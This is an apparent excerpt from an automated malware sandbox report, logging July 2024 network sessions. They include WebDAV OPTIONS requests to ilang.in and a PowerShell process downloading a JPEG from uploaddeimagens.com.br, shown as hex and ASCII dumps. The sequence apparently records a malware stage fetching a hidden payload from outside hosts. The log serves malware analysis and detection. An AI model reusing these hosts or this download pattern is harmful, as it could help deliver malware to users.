                Data Ascii: fa+m6owfhLc7Dp25P2wTnAuna6AjTFe/r2KTqhPKKP2saVLpEjrYNCrTN/U+9i06UvUIIEbxP4Cy3dn2pez9gZ9VFVy6YSsyefMXmFJ5QDRpisnylpI0fJ33bgKZig0JAB7WJ+YUIpv8BLRQh8gpZ+KpN9DhaKruKKrvrL2K3PodHiBcYZWjze2dzA4mUo9yds4Bkx0CLfPGUqXP+a8qZFhJqKcdo7uP0fQeLIw3xe9l3cQpGQ3
                Jul 2, 2024 07:52:54.290183067 CEST1236INData Raw: 50 4b 36 46 38 55 72 32 68 52 66 43 2b 34 6e 7a 6a 34 79 6b 6a 77 6a 72 64 4e 72 56 78 37 4f 2b 4c 39 62 4b 34 7a 67 47 78 53 69 63 52 4e 42 4c 51 58 78 35 67 68 58 39 42 62 2f 6b 4b 34 46 36 73 45 56 2f 33 71 56 75 5a 75 43 4c 42 70 6c 69 66 50
                Data Ascii: PK6F8Ur2hRfC+4nzj4ykjwjrdNrVx7O+L9bK4zgGxSicRNBLQXx5ghX9Bb/kK4F6sEV/3qVuZuCLBplifPgttORyWFJDboGYrRt2utL2ByJbMaRw46O5XLpUOK3Ytbpq4ob0pMRkKUPNkbF7fEBLVCFDCL5TOAq/cj7/owf9dzTcfXhXp7jblBJ3o2ydw4P2m33goimdGGkBbx5PhXhFps4wqMhg5uPXyjGhicmapV9W12TKBgK
                Jul 2, 2024 07:52:54.294544935 CEST1236INData Raw: 57 5a 67 56 2f 46 50 39 56 4e 53 45 4f 46 50 64 4f 46 56 4a 61 51 6f 4b 6c 39 43 43 64 34 6d 68 43 6d 42 4b 63 56 72 49 65 36 66 45 4b 53 4d 55 7a 61 4e 68 63 49 57 31 72 70 77 2b 65 5a 37 42 62 78 6d 52 4a 47 70 76 41 68 72 48 61 71 4d 53 4c 34
                Data Ascii: WZgV/FP9VNSEOFPdOFVJaQoKl9CCd4mhCmBKcVrIe6fEKSMUzaNhcIW1rpw+eZ7BbxmRJGpvAhrHaqMSL4kCehCsvrpP/8f2rLvQhuObmFv6AXQTFl5FrKi4zLc5wfu8xNNxVx9/hSebRnoC9+E1udRHJDDxSUHOC1Uj1nxbOyhwwsA4OdaTgEodlLL0yjM7besixmkUFUpz7oRyAFe2rA/dBMxEc8tthqiDlcmkShK64mTZCt0


                Session IDSource IPSource PortDestination IPDestination Port
                13192.168.2.2249178194.163.41.11780
                TimestampBytes transferredDirectionData
                Jul 2, 2024 07:53:41.865228891 CEST194OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                Cookie: short_1359230=1; PHPSESSID=f463d2694e8a3c4b0f4885e35da4ccc7
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: ilang.in
                Jul 2, 2024 07:53:42.871073961 CEST1216INHTTP/1.1 301 Moved Permanently
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                content-type: text/html
                content-length: 795
                date: Tue, 02 Jul 2024 05:53:42 GMT
                server: LiteSpeed
                location: https://ilang.in/
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                Jul 2, 2024 07:53:43.086874008 CEST1216INHTTP/1.1 301 Moved Permanently
                Connection: Keep-Alive
                Keep-Alive: timeout=5, max=100
                content-type: text/html
                content-length: 795
                date: Tue, 02 Jul 2024 05:53:42 GMT
                server: LiteSpeed
                location: https://ilang.in/
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent
                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 3e 40 6d 65 64 69 61 20 28 70 72 65 66 65 72 73 2d 63 6f 6c 6f 72 2d 73 63 68 65 6d 65 3a 64 61 72 6b 29 7b 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 30 30 30 21 69 6d 70 6f 72 74 61 6e 74 7d 7d 3c 2f 73 74 79 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c [TRUNCATED]
                Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title><style>@media (prefers-color-scheme:dark){body{background-color:#000!important}}</style></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                Session IDSource IPSource PortDestination IPDestination Port
                0192.168.2.2249171194.163.41.117443
                TimestampBytes transferredDirectionData
                2024-07-02 05:52:41 UTC150OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                Cookie: short_1359230=1
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: ilang.in
                2024-07-02 05:52:41 UTC758INHTTP/1.1 405 Method Not Allowed
                Connection: close
                x-powered-by: PHP/7.4.33
                set-cookie: PHPSESSID=daeebe4dd2da88fb85d45c97edde2ab5; path=/; secure
                expires: Thu, 19 Nov 1981 08:52:00 GMT
                cache-control: no-store, no-cache, must-revalidate
                pragma: no-cache
                content-type: text/html; charset=UTF-8
                content-length: 1720
                date: Tue, 02 Jul 2024 05:52:41 GMT
                server: LiteSpeed
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent
                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
                2024-07-02 05:52:41 UTC610INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 09 09 09 09 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 09 09 09 09 3c 68 65 61 64 3e 0d 0a 09 09 09 09 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 20 2f 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 65 64 67 65 22 20 2f 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0d 0a 09 09 09 09 20 20 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 35 3c 2f 74 69 74 6c 65 3e 0d 0a 09 09 09 09 20 20 20 20 3c 6c 69
                Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="utf-8" /><meta http-equiv="X-UA-Compatible" content="IE=edge" /><meta name="viewport" content="width=device-width, initial-scale=1" /> <title>Error 405</title> <li
                2024-07-02 05:52:41 UTC1110INData Raw: 74 3a 31 30 30 25 3b 64 69 73 70 6c 61 79 3a 74 61 62 6c 65 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 27 53 6f 75 72 63 65 20 43 6f 64 65 20 50 72 6f 27 2c 20 6d 6f 6e 6f 73 70 61 63 65 3b 7d 68 31 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 2e 31 3b 63 6f 6c 6f 72 3a 69 6e 68 65 72 69 74 3b 66 6f 6e 74 2d 73 69 7a 65 3a 33 36 70 78 7d 68 31 20 73 6d 61 6c 6c 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 37 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 3b 63 6f 6c 6f 72 3a 23 46 46 30 33 37 41 7d 61 7b 74 65 78 74 2d 64 65 63 6f 72 61 74 69 6f 6e 3a 6e 6f 6e 65 3b 63 6f 6c 6f 72 3a 23 30 38 30 61 32 30 3b 66 6f 6e 74 2d 73 69 7a 65 3a 69 6e 68 65 72 69 74
                Data Ascii: t:100%;display:table;font-family: 'Source Code Pro', monospace;}h1{font-family:inherit;font-weight:700;line-height:1.1;color:inherit;font-size:36px}h1 small{font-weight:700;line-height:1;color:#FF037A}a{text-decoration:none;color:#080a20;font-size:inherit


                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                1192.168.2.2249176188.114.96.34433688C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                TimestampBytes transferredDirectionData
                2024-07-02 05:52:52 UTC124OUTGET /images/004/807/053/original/new_image.jpg?1719846235 HTTP/1.1
                Host: uploaddeimagens.com.br
                Connection: Keep-Alive
                2024-07-02 05:52:53 UTC694INHTTP/1.1 200 OK
                Date: Tue, 02 Jul 2024 05:52:53 GMT
                Content-Type: image/jpeg
                Content-Length: 425945
                Connection: close
                Last-Modified: Mon, 01 Jul 2024 15:03:55 GMT
                ETag: "6682c55b-67fd9"
                Cache-Control: max-age=2678400
                CF-Cache-Status: REVALIDATED
                Accept-Ranges: bytes
                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=5cPKTjJ7n6YFsje%2BI7bYBX%2F7wnaSiZN4R5RkaUKcoNbumjIsxFOREIZ9bbBg2mdQoItpAAWrZTV7mCqVskqWPQEduzI4%2BeZHWtwdVhLA%2FIqKuKHA7lM2A8cK%2FRXIb7n5hByXkS1DhIUn"}],"group":"cf-nel","max_age":604800}
                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                Server: cloudflare
                CF-RAY: 89cc5f497f0a1795-EWR
                alt-svc: h3=":443"; ma=86400
                2024-07-02 05:52:53 UTC675INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                2024-07-02 05:52:53 UTC1369INData Raw: 95 2e 54 7a 99 be b9 63 d3 ad 1c a9 63 d2 be b8 15 dc 4a 9b b5 f6 ac 1a 1d a4 90 41 f9 f5 cb 17 56 b0 39 f7 ca 11 67 70 34 3b e0 19 9c 70 c7 be 09 9c 37 21 fa 76 ca b3 a0 53 7e 9c 42 5d 62 23 10 87 76 03 6f 2e c3 b8 da df b6 25 36 bf 69 21 3f 35 c4 e6 d4 3c b6 49 a1 82 02 c7 4f ae 05 84 f2 4b 7e 6b b6 df 6c b3 6d d8 28 82 3d bb e5 42 9a ce a7 1c 91 81 c0 2a b0 a5 a3 84 2c 78 be bd b0 04 d9 e9 47 df 08 1e a8 55 9c 0b 96 35 c9 a1 92 08 f7 bf 86 50 9d c0 ae de bc 61 b4 da 79 27 72 91 45 b9 c2 ee da 18 02 c0 72 76 8e fc 5e 01 75 1a 59 74 e1 37 15 2a e0 30 75 e4 72 a0 d7 cf 9c 09 24 55 fe 78 f4 b2 09 9b ee cc 41 2d 0c 4f 19 ed b8 46 b6 39 f7 16 3e 75 99 c5 82 c6 49 5e 4f 1f 5e ff 00 96 05 67 d4 79 34 41 b2 d9 9a ee ce e5 9b 92 70 9b 99 a5 de dc d9 e7 e1 ce 43
                Data Ascii: .TzccJAV9gp4;p7!vS~B]b#vo.%6i!?5<IOK~klm(=B*,xGU5Pay'rErv^uYt7*0ur$UxA-OF9>uI^O^gy4ApC
                2024-07-02 05:52:53 UTC1369INData Raw: 25 56 1e 41 ae 79 bf e9 81 0d e2 32 08 62 56 d4 c8 4a 93 bb 69 0a d5 db af e5 8d cb e2 41 e1 60 81 c1 b0 4b 3d 5f e4 3a e6 02 10 5f 8e a3 9e 98 fc 65 44 44 96 dc 6f f2 c0 d9 8b 58 da 88 99 c3 b2 81 01 02 8d 5b 7b e6 47 8a 4a 1a 18 d1 9e 47 7d c4 ee 77 0d fc ba 61 0b 95 87 ad 02 38 cc bf 25 9f 73 03 64 1b ac 0e 0a 5b 4a 38 24 86 e0 63 4c e9 0c 70 5c 60 8b 36 0f cc 64 96 29 a7 24 a9 e9 db 04 b1 2c ba 65 63 a8 00 29 e4 1e d8 02 dc fe 71 28 36 96 3e 9e 68 01 7c 65 b5 29 32 1b 96 cb 29 da 5b 75 f3 d7 0f f7 64 91 77 19 d5 52 bd 3c 65 9a 04 3a 32 ad 39 dc be aa 2b d7 e5 80 9c 9a 93 2c 41 4f 51 96 d3 ea a5 88 6c 41 b9 79 b5 f7 c5 c0 06 ef 8e 31 dd 14 48 ee a0 3d 12 68 9c 06 fc 3f 4b 2e a7 54 b2 4d 4b 08 e4 82 78 61 ed 9b f3 6a 67 99 d7 c3 b4 11 24 6a 08 6b 56 ab
                Data Ascii: %VAy2bVJiA`K=_:_eDDoX[{GJG}wa8%sd[J8$cLp\`6d)$,ec)q(6>h|e)2)[udwR<e:29+,AOQlAy1H=h?K.TMKxajg$jkV
                2024-07-02 05:52:53 UTC1369INData Raw: 54 e1 fc c6 72 37 71 4c 7a fc b1 32 69 85 9d cc 4f 37 99 5a ed 73 b7 89 69 f4 b6 41 17 25 1f 6e 47 18 1b 52 eb 3f 7b cf 4f 7c 13 6a 06 e0 43 7d 31 39 81 65 b0 7b e5 51 59 85 12 70 1b 1a b2 58 9b af 86 10 6a 83 70 c4 13 ef ed 88 ec 2c c7 a8 ac a9 47 57 ba 24 55 f1 81 a3 bd 9d 96 98 71 dc e5 5e 42 a5 bd 56 40 bf 86 2e 8c 01 50 7b e4 3b 30 6b 09 60 f0 6f a5 60 59 f5 4d d0 1b e2 f1 49 b5 74 a7 77 43 c5 e1 24 65 0a d4 45 8e c3 12 d8 b3 ab 2b 30 e3 9c 00 78 66 bb 4a 8d 2e 9f 4e 79 57 2c d6 73 45 75 8a 1b 69 60 2f a6 65 68 fc 3f 4f 0e b6 51 18 51 23 f2 79 ea 31 8d 58 8f 4f 0b 4f 35 05 41 ba fa 60 31 e2 1e 2d 16 82 07 9a 57 00 28 a0 3d ce 2b a3 f1 45 d4 e9 44 e2 c6 ee 68 e7 8b 79 e6 fb 53 e2 bb 01 2b a5 8b d4 07 be 7a b8 95 60 d3 ac 61 00 0a 28 01 df 00 fa 87 8e
                Data Ascii: Tr7qLz2iO7ZsiA%nGR?{O|jC}19e{QYpXjp,GW$Uq^BV@.P{;0k`o`YMItwC$eE+0xfJ.NyW,sEui`/eh?OQQ#y1XOO5A`1-W(=+EDhyS+z`a(
                2024-07-02 05:52:53 UTC1369INData Raw: f9 ca c8 48 50 a3 af 73 92 1d 11 95 63 62 c2 b9 b1 9d 2e 98 46 14 06 1e af a8 c1 24 65 25 00 b0 2a 7a 9f 86 06 ae 85 92 2a 49 4d b1 4a a0 2e af 17 d5 44 04 a0 d9 00 37 e1 be b8 7d 23 23 48 18 20 6d b6 07 6c 36 a5 d2 66 08 83 6d 0b 22 ba e0 05 bc 37 4c f1 79 82 46 16 bb af ad fc 30 6a 9a 78 d6 b7 a0 20 d9 2b b8 11 fa 63 62 24 8d 89 67 01 54 32 ed 63 d2 86 2a 1f ef 0e 5e 38 d5 54 75 bf 6a c0 e8 60 f3 a2 a9 67 37 cf 1e a3 c5 fc b1 89 42 29 28 a3 70 07 6a 8f 80 1d 71 35 99 8a b1 0d b5 57 a0 3d b2 1f 56 1a 7a 2d 7e a2 45 8a c0 d0 1a 84 45 54 44 ed db be 66 4f a8 42 ce 80 35 6e ba ba e7 1a 56 de f6 a0 0f f1 57 7c 52 6d 1c 92 cc 5c 11 4c d4 49 ed 80 54 9d 95 55 54 b1 04 56 ef 6c 87 44 23 76 d6 af e2 20 61 e2 54 40 a9 76 40 ab f7 ce 62 e2 e8 a9 5e 84 1c 08 82 7d
                Data Ascii: HPscb.F$e%*z*IMJ.D7}##H ml6fm"7LyF0jx +cb$gT2c*^8Tuj`g7B)(pjq5W=Vz-~EETDfOB5nVW|Rm\LITUTVlD#v aT@v@b^}
                2024-07-02 05:52:53 UTC1369INData Raw: a4 52 cc a5 76 d0 0c 4f 4b 61 78 1e 78 15 7e ab 7f 0c 63 4e 88 d2 84 31 17 b1 e9 50 c5 6b ea 30 22 c0 e2 f7 77 1d 86 71 90 af 73 7f 0c 0d 43 a1 a5 e3 4c a6 bb 89 5b 8f 9f a7 2a fa 22 bb 6f 4c b4 4d 7a 64 6a fa f1 8a c1 ac 9c cf 12 99 a6 71 b8 0d aa c6 cf 3d 33 d1 ce ea fa 56 31 a2 db 10 9c 80 6f ad 8a 3d aa ef 9c 0c 73 a0 43 75 a6 5a 06 8d cc c3 fa 67 2e 89 28 56 91 48 3d 0f 9a 48 fc eb 3d 01 82 3f 3b 72 a4 61 aa ba 00 55 7d 85 0e 9f 5c 21 86 c0 b0 a4 7b 0c 0f 3c 34 4a c7 8d 3a 90 3f fb 69 e3 ff 00 0e 17 4f e0 b3 4f 32 bc 5a 55 5e 6c 39 9d 97 69 1d 0f e1 eb 79 b8 23 8d 48 a2 01 ec 08 b1 92 0c 85 c9 f3 4d 8f 73 55 80 ac fe 0b 0e b3 c4 97 59 1c ac b2 ab 2b 48 cc cb 6a 55 46 d2 ab 55 46 8d df 4f 8f 4c c7 d4 e8 9b 4f 3e a4 69 b4 10 88 a1 6d c1 e6 9b a2 92 76
                Data Ascii: RvOKaxx~cN1Pk0"wqsCL[*"oLMzdjq=3V1o=sCuZg.(VH=H=?;raU}\!{<4J:?iOO2ZU^l9iy#HMsUY+HjUFUFOLO>imv
                2024-07-02 05:52:53 UTC1369INData Raw: 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 cd a9 d3 2c f6 ca 7a 90
                Data Ascii: .f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk},z
                2024-07-02 05:52:53 UTC1369INData Raw: 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa a8 e3 ae 53 53 a5 49 23
                Data Ascii: vu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8rSSI#
                2024-07-02 05:52:53 UTC1369INData Raw: a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 03 83 ce 16 42 e4 92 48
                Data Ascii: mnq#O**!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};|1zwr80/`vI<R@i*$!@BH
                2024-07-02 05:52:53 UTC1369INData Raw: f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 07 53 a8 8e 21 76 cc 16
                Data Ascii: #K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU|JG4]Crj4825A=G=pG/|v>*M)phJeenBx}66Ov$EZX\:2A hCS!v


                Session IDSource IPSource PortDestination IPDestination Port
                2192.168.2.2249179194.163.41.117443
                TimestampBytes transferredDirectionData
                2024-07-02 05:53:43 UTC194OUTOPTIONS / HTTP/1.1
                Connection: Keep-Alive
                Cookie: short_1359230=1; PHPSESSID=f463d2694e8a3c4b0f4885e35da4ccc7
                User-Agent: Microsoft-WebDAV-MiniRedir/6.1.7601
                translate: f
                Host: ilang.in
                2024-07-02 05:53:44 UTC686INHTTP/1.1 405 Method Not Allowed
                Connection: close
                x-powered-by: PHP/7.4.33
                expires: Thu, 19 Nov 1981 08:52:00 GMT
                cache-control: no-store, no-cache, must-revalidate
                pragma: no-cache
                content-type: text/html; charset=UTF-8
                content-length: 1720
                date: Tue, 02 Jul 2024 05:53:44 GMT
                server: LiteSpeed
                platform: hostinger
                strict-transport-security: max-age=31536000; includeSubDomains; preload
                x-xss-protection: 1; mode=block
                x-content-type-options: nosniff
                vary: User-Agent,User-Agent,User-Agent
                alt-svc: h3=":443"; ma=2592000, h3-29=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q043=":443"; ma=2592000, quic=":443"; ma=2592000; v="43,46"
